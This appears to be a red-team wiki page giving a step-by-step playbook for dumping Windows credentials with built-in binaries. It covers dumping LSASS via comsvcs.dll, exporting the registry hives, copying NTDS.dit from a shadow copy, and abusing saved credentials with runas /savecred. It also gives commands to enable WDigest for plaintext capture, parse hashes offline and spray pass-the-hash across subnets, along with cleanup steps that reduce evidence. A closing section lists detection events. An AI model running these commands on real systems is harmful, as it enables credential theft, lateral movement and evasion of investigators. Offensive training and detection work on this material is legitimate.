Skip to main content

T1003: OS Credential Dumping (LOL Methods)


Technique Requirements​

Privileges RequiredAdministrator (SAM/SECURITY hives) / SYSTEM or SeDebugPrivilege (LSASS)
Effective PermissionsCredentials of all locally authenticated users / service accounts
Triggered ByManual execution
Employment Complexity2/5 - Low
Detection Complexity2/5 - Low

Background​

After obtaining an elevated session, credential dumping is the highest-value immediate action available to an operator. Credentials harvested from one system unlock lateral movement to every other system where those accounts are reused - domain accounts in particular can propagate access across the entire environment.

This technique covers LOL-only methods: no Mimikatz binary, no custom tools. Everything runs using signed Windows binaries already present on every system.

What Credentials Live Where​

SourceWhat You GetPrivileges Needed
LSASS memoryNTLM hashes + plaintext passwords (if WDigest enabled) for all interactively logged-on users, including domain accountsSYSTEM or SeDebugPrivilege
SAM hiveNTLM hashes for all local accountsAdministrator
SYSTEM hiveBoot key (required to decrypt SAM)Administrator
SECURITY hiveLSA secrets: service account credentials, cached domain logon hashes (DCC2), machine account hashAdministrator
NTDS.ditAll domain account hashes (Domain Controller only)SYSTEM on DC

LSASS is the primary target in most engagements because it holds domain account credentials in memory - domain hashes (and sometimes plaintext) enable Pass-the-Hash and Pass-the-Ticket attacks across the environment. SAM + SYSTEM covers local accounts and is useful when domain credentials aren't present or when you need the local Administrator hash for lateral movement via Pass-the-Hash.

WDigest and Plaintext Passwords​

On older Windows systems (pre-Windows 8.1 / Server 2012 R2), WDigest authentication was enabled by default, causing Windows to cache plaintext passwords in LSASS memory alongside NTLM hashes. On modern systems WDigest is disabled by default, but the registry setting can be changed by an attacker (or may have been re-enabled by legacy software):

# Check WDigest status (1 = enabled = plaintext in LSASS)
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

# Enable WDigest to capture plaintext on next logon
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
caution

Enabling WDigest only affects credentials cached after the change - existing LSASS contents are not upgraded to plaintext. A user must log on (or lock/unlock) after the change for their plaintext to appear. Only enable this if you are willing to wait for the next logon event.


Procedures​

Method 1: LSASS MiniDump via comsvcs.dll (T1003.001)​

Requires: SYSTEM or SeDebugPrivilege LOL binaries used: rundll32.exe, tasklist.exe

comsvcs.dll is a legitimate Windows COM+ Services DLL that ships with every Windows install. It exports a MiniDump function normally used for crash diagnostics. When called via rundll32, it produces a full memory dump of a target process - including LSASS.

The dump file is not immediately readable, but can be parsed offline on your Kali VM to extract hashes.

  1. Find the LSASS PID:

    tasklist /FI "IMAGENAME eq lsass.exe"
    Get-Process lsass | Select Id
  2. Dump LSASS to disk using comsvcs.dll:

    rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Windows\Temp\lsass.dmp full
    $lsassPid = (Get-Process lsass).Id
    rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\Windows\Temp\lsass.dmp full

    Storage path: Write the dump to a location you can later download from - C:\Windows\Temp\ works well. The dump file will be ~30–100 MB depending on system uptime and loaded credentials.

  3. Download the dump to your Kali VM: From your Meterpreter session or another download mechanism:

    meterpreter > download C:\Windows\Temp\lsass.dmp /tmp/lsass.dmp

    Or using PowerShell from your attack host:

    # Serve from victim via SMB or use your existing file transfer method
  4. Parse the dump on Kali using pypykatz (pre-installed on Kali):

    pypykatz lsa minidump /tmp/lsass.dmp

    Extract just NTLM hashes for use in Pass-the-Hash:

    pypykatz lsa minidump /tmp/lsass.dmp | grep -E "Username|NT:|Password" | grep -v "None"
    tip

    pypykatz output includes the MSV (NTLM), Kerberos, WDigest, DPAPI, and LiveSSP credential providers. Look for NT: lines for NTLM hashes. If WDigest was enabled, Password: lines will contain plaintext.


Method 2: SAM + SYSTEM + SECURITY Hive Export via reg.exe (T1003.002 / T1003.004)​

Requires: Administrator LOL binaries used: reg.exe

The SAM (Security Account Manager) database holds NTLM hashes for all local accounts. It is encrypted at rest with a boot key derived from the SYSTEM hive. The SECURITY hive contains LSA secrets: credentials for services running as domain accounts, and cached domain logon hashes (DCC2) for users who have previously logged on.

All three hives must be exported together - SAM alone is encrypted and unreadable without the SYSTEM boot key.

  1. Export the three hives:

    reg save HKLM\SAM C:\Windows\Temp\sam.hive
    reg save HKLM\SYSTEM C:\Windows\Temp\system.hive
    reg save HKLM\SECURITY C:\Windows\Temp\security.hive
  2. Download the hive files to Kali:

    meterpreter > download C:\Windows\Temp\sam.hive /tmp/sam.hive
    meterpreter > download C:\Windows\Temp\system.hive /tmp/system.hive
    meterpreter > download C:\Windows\Temp\security.hive /tmp/security.hive
  3. Parse offline on Kali using impacket-secretsdump:

    impacket-secretsdump -sam /tmp/sam.hive -system /tmp/system.hive -security /tmp/security.hive LOCAL

    Example output:

    [*] Target system bootKey: 0x3b3b1234...
    [*] Dumping local SAM hashes (uid:rid:lmhash:nthash):
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    svc_backup$:1001:aad3b435b51404eeaad3b435b51404ee:a87f3a337d73085c45f9416be5787d86:::
    [*] Dumping cached domain logon information (domain/username:hash):
    DOMAIN/jsmith:$DCC2$10240#jsmith#a4b5c6...
    [*] Dumping LSA Secrets:
    [*] $MACHINE.ACC
    ...

    The output format is username:RID:LM_hash:NT_hash. The NT hash (last field) is what you use for Pass-the-Hash.

  4. Clean up the hive files from the victim:

    del C:\Windows\Temp\sam.hive C:\Windows\Temp\system.hive C:\Windows\Temp\security.hive

Method 3: Shadow Copy + NTDS.dit (T1003.003 - Domain Controllers only)​

Requires: SYSTEM on a Domain Controller LOL binaries used: vssadmin.exe, cmd.exe

On a Domain Controller, all domain account hashes live in NTDS.dit. This file is locked while the DC is running, but a shadow copy can be used to access it without stopping the NTDS service.

  1. Create a shadow copy:

    vssadmin create shadow /for=C:

    Note the shadow copy device path from the output (e.g., \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1).

  2. Copy NTDS.dit and the SYSTEM hive from the shadow copy:

    copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit" C:\Windows\Temp\ntds.dit
    copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM" C:\Windows\Temp\system.hive
  3. Download both files to Kali and parse offline:

    impacket-secretsdump -ntds /tmp/ntds.dit -system /tmp/system.hive LOCAL

    This dumps every domain account hash in the environment - all user accounts, service accounts, and computer accounts.

  4. Delete the shadow copy when done to reduce evidence:

    vssadmin delete shadows /shadow=<SHADOW_ID> /quiet

Method 4: Windows Credential Manager β€” cmdkey + runas /savecred (T1555.004)​

Requires: User LOL binaries used: cmdkey.exe, runas.exe

The Windows Credential Manager stores saved credentials (usernames + passwords) for network resources, websites, and remote sessions. These are credentials the user chose to save β€” "remember my password" prompts from RDP, mapped drives, and web browsers (legacy IE/Edge). They are often stale but frequently contain domain credentials.

cmdkey.exe lists and manages credentials. runas /savecred reuses a saved credential to run a command as another user β€” if a credential for a domain admin account exists in the store, you can use it to execute arbitrary commands as that user with no password prompt.

  1. Enumerate saved credentials:

    cmdkey /list

    Example output:

    Currently stored credentials:

    Target: Domain:target=CORP\jdoe
    Type: Domain Password
    User: CORP\jdoe

    Target: MicrosoftOffice16_Data:SSPI:user@corp.local
    Type: Generic
    User: user@corp.local

    Target: TERMSRV/192.168.1.10
    Type: Domain Password
    User: CORP\administrator

    Key targets:

    • TERMSRV/ entries β€” saved RDP credentials, often domain admin accounts
    • Domain:target=CORP\ entries β€” saved domain account credentials
    • MicrosoftOffice / OneDrive β€” often contain O365/Azure AD credentials
  2. Use a saved credential to run a command (no password prompt):

    If a useful credential exists (e.g., CORP\administrator stored for an RDP target):

    runas /savecred /user:CORP\administrator "cmd.exe /c whoami > C:\Windows\Temp\id.txt"
    # Open an interactive shell as the saved user:
    runas /savecred /user:CORP\administrator cmd.exe
    note

    runas /savecred only works if the credential is already in the store for that exact username. The /savecred flag tells runas to look up the saved password rather than prompting. If no matching credential exists, the command fails with "The credentials supplied to the package were not recognized."

  3. Implant a credential for later use (if you know a password you want to persist):

    cmdkey /add:<TARGET_OR_DOMAIN> /user:<DOMAIN>\<USERNAME> /pass:<PASSWORD>

    Example β€” store domain admin credentials for later runas /savecred use:

    cmdkey /add:CORP /user:CORP\administrator /pass:Summer2024!
    runas /savecred /user:CORP\administrator "powershell -nop -w 1 -c <PS_CRADLE>"
  4. Lateral movement via saved RDP credential:

    If TERMSRV/<IP> is in the store, mstsc will connect without prompting for credentials β€” or use runas /savecred to execute a payload on the remote host via the saved credentials:

    # Spawn a shell as the stored RDP user, then use that context for lateral movement
    runas /savecred /user:CORP\administrator "powershell -nop -w 1 -c <PS_CRADLE>"
  5. Cleanup (remove the implanted credential):

    cmdkey /delete:CORP
    cmdkey /delete:TERMSRV/<TARGET_IP>

What to Expect​

From LSASS (pypykatz output):

== LogonSession ==
authentication_id 123456 (1e240)
session_id 1
username jsmith
domainname CORP
logon_server DC01
logon_time 2026-03-21T08:00:00.000000+00:00
sid S-1-5-21-...
== MSV ==
Username: jsmith
Domain: CORP
NT: 8f4b5c2e1a3d... <-- NTLM hash for Pass-the-Hash
== WDIGEST [optional if enabled] ==
Username: jsmith
Password: Summer2024! <-- Plaintext if WDigest enabled

From SAM (secretsdump output):

Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::

Using the hashes for lateral movement:

Pass-the-Hash with impacket tools on Kali (no cracking required):

# Open an interactive shell on a remote host as Administrator using only the hash
impacket-psexec -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@<TARGET_IP>

# Or WMI-based execution:
impacket-wmiexec -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@<TARGET_IP>

# Or SMB/secretsdump against remote target (to pull more creds from another box):
impacket-secretsdump -hashes :8846f7eaee8fb117ad06bdd830b7586c Administrator@<TARGET_IP>

Pass-the-Hash with CrackMapExec for network-wide spraying:

crackmapexec smb <SUBNET>/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
tip

The built-in local Administrator account (RID 500) is particularly valuable for PTH because it is exempt from UAC remote restrictions that affect other admin accounts. A hash for the local Administrator account often works against multiple machines in the environment if the organization uses a common local admin password (very common).


Log Detection​

  • Source: Microsoft-Windows-Sysmon/Operational
    • EventID:10 (ProcessAccess)
      • Contains source/target process - look for any process opening lsass.exe with PROCESS_VM_READ access rights; rundll32.exe β†’ lsass.exe is a strong indicator
    • EventID:1 (ProcessCreate)
      • rundll32.exe executing comsvcs.dll with MiniDump argument
      • reg.exe save HKLM\SAM or reg.exe save HKLM\SYSTEM
    • EventID:11 (FileCreate)
      • .dmp file created in temp directories
      • .hive files created in writable locations
  • Source: Security
    • EventID:4656 / 4663 (Object access)
      • Access to HKLM\SAM or HKLM\SECURITY registry hives
    • EventID:4688 (Process creation with command line auditing)
      • rundll32.exe with comsvcs.dll and MiniDump in arguments
  • Source: Microsoft-Windows-NTLM/Operational
    • EventID:4 (NTLM authentication attempt)
      • Pass-the-Hash produces NTLM type 3 messages without a prior Kerberos exchange - look for NTLM auth from unexpected source hosts